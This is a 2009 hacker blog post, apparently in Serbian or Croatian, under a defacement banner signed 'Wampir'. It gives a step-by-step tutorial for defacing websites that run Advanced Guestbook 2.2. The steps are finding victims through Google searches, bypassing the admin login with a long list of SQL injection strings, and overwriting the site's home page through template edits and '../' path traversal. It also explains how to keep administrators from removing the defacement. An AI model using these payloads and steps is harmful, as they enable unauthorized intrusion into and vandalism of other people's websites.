..::--- United Vitomirica Crew ---::..

WebSitE haS beeN HaCkeD bY Wampir

Vitomirica is a part of Kosovo!

Greetz to all members of United Vitomirica Crew

Samo je jedan ORIGINAL a svi ostali su kopije -==- We Love Vitomirica

:: www.VitomiricaCafe.com ::



United Vitomirica Crew
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - H4Ck3r - ... -==- We Love Vitomirica -==-... - Blog.hr

... -==- We Love Vitomirica -==-...

ponedjeljak, 20.04.2009.

H4Ck3r

Na pochetku da kazhem da je ovo neverovatno lako i l4m3, ali mozhe dosta i da se nauchi.
Za ovaj deface potrebno vam je da znate nesho malo SQL injection ( u stvari to vam ne treba ja cu vam reci shta treba da tachno da radite ;)
Oke samo pre pochetka da kazhem da ja nisam odgovoran nizashta shto vi uradite uz pomoc ovog tutoriala, kao shto su raspad sveta kakvog danas znamo, propast celokupne internet mrezhe ili rat sa drugim galakijama :)

Ako ste bash l4m3 mozhete zhrtve da trazhite i preko Googla (ili nekog drugog search engine ).
Znachi odete na Google i ukucate Advanced guestbook 2.2. i dobijete listu sajtova, naprimer vasha meta je www.zhrtva.com/guesbook/index.php
vi lepo uzmete i umesto index.php stavite admin.php i onda to izgleda kao www.zhrtva.com/guesbook/admin.php
Tu vam se pokazhe login page za admina, e sad vi treba da provalite koji SQL kod treba da

ubaccite :
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Ali da bih vam olakshao posao...
Username ostavite prazno a u password unesite tacho
') OR ('a' = 'a
Oke sad se pred vama nadje admin cp tog guestbook-a, idite na templates i sa leve strane kliknite body, header foother ili neshto drugo i obrishite to shto je bilo i stavite vashu poruku i kliknite na save na dnu stranice. Ako zhelite da admini nemogu da obrishu deface onda promenite i stranicu admin.php
E sad kad ste sachuvali to ako vam na pochetku stranice pishe neka greshka onda znachi da nemozhete na taj nachin da promenite GB, e onda morate da odete na EASY ADMIN i da editujete neki post, ali pre toga idite na General settings i stavite da bude 1 post po stranici i onda editujte post i stavite neshto u HTML-u kao :



http-equiv="content-type">
H4Ck3r - ... -==- We Love Vitomirica -==-... - Blog.hr

style="color: rgb(255, 0, 0); background-color: rgb(0, 0, 0);">

H4CK3D BY W4MP1R






Ali ako mozhemo mozhemo da editujemo preko TEMPLATES onda mozhemo da uradimo i sledece.
kao malopre kliknite na neshto sa leve strane ( header. foother..) i tamo gde pishe TPL_NAME=header.php promenite u ../../index.html
i sad editujte i pochetnu stranicu iz guestbook-a cool :)))
../ = jedan direktorijum u nazad
../ = josh jedan
index.html = glavna stranica mozhe da bude drugachije

Ako zhelite da defacujete neke druge guestbook-ove mozhete jednostavno da ubacite ubacite neki HTML kao onaj gore shto sam naveo.
- 15:20 - Komentari (0) - Isprintaj - #

<< Arhiva >>

Edited by Wampir - Kontakt Pecanac007@Net.Hr, Wampir@Usa.Com H4Ck3r - ... -==- We Love Vitomirica -==-... - Blog.hr